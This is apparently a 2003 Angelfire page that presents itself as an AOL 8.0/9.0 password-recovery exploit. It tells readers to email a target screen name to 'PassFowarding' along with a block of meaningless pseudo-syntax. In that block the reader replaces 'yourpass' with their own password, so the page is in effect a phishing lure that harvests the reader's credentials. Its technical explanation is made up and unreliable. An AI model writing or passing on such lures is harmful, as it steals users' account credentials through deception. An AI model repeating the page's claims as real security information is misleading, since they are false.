AOL v8.0 v9.0 Password Exploits Release Date August 18, 2003 ------------------------------------------------------------------------------------------------------------------------ America Online v8.0 v9.0 Password Hack 8.18.03         An exploit to the general public by AirMax In 2001 the Leading search string used in Googles World Famous search engine was the four letter word 'HACK.' It beat the previously leading three letter word 'SEX.' In a further study what it was that people so desired to hack was the almighty America Online password service. If you ever wondered why AOL updated so quickly after AOL 4.0 it was because they continued to find their selves vulnerable to hackers, and the only way to fix the holes in their system was to have a system wide update. So here I am releasing the exploit for the most updated versions of AOL, versions 8.0 and 9.0, and here is the flaw. In America Online's password recovery service, there is a script that allows a user, once Online to prompt the America Online Password Recovery web site to send his or her password to the account e-mail address. i.e.. If I AirMax were to Log onto AirMax and go to the AOL web page and try and recover the account password I could get it sent to AirMax@aol.com. The purpose of this was that there was an influx of users who were losing their passwords due to the fact that they had their passwords automatically saved for log on, and when the user updated to a newer version of America Online they could no longer remember the password when prompted. So this option on the America Online website was a big help for this issue. Until a few buddies and my self decided to take apart the mechanics of this script and use it for our own corrupt means. Here is how it works in lamen terms, when the web user entered their screen name and clicked the send button an e mail was sent to an AOL server that accessed the password from the main server and forwarded it to the same account. (This is not a security risk because it would only send the password to the users account which does not allow for miscellaneous users to access the e mail) So after hours and hours of reading through hex code we finally found the e mail server that the e-mails were being sent to. Once we found the e-mail server we sent a generated e-mail to it and it sent us a scripted response requesting the proper information, thus providing us with the blue print of what we needed to give it in order to get what we wanted. So here is what we did; We set up an AOL account that automatically forwarded the emails that were sent to it, to the AOL server with the proper scripting. And when the proper script is sent to the E-mail server and a User Screen name is given along with a password, the server is tricked into thinking that the user has been verified as online and then sends the e-mail with the password you requested back to the given e-mail address. Here is how you do it First - Open a blank e-mail addressed to "PassFowarding" (On America Online Only) Second - In the subject line in all lowercase letters type the screen name of the account who's password you want returned. Third- In the body of the e-mail paste the following -PassServ- Syntax: SET user pass option parameters *K-line*-@Wireops.returnservice.net) = Userpass=(yourpass)_@Foward-PassServ-Syntax: Accept /y /a /n - Subject =(subj-applicant@TEXTBODY*) Start Pass Recovery cls Forth- look for this string without the quotes "= Userpass=(yourpass)" Replace the text yourpass with the password of the Screen Name that you sent the e-mail from. Last - Make sure Spell Checker does not run and send the e-mail. Your request will be put in queue and sent within 2 working days.
Site hosted by Angelfire.com: Build your free website today!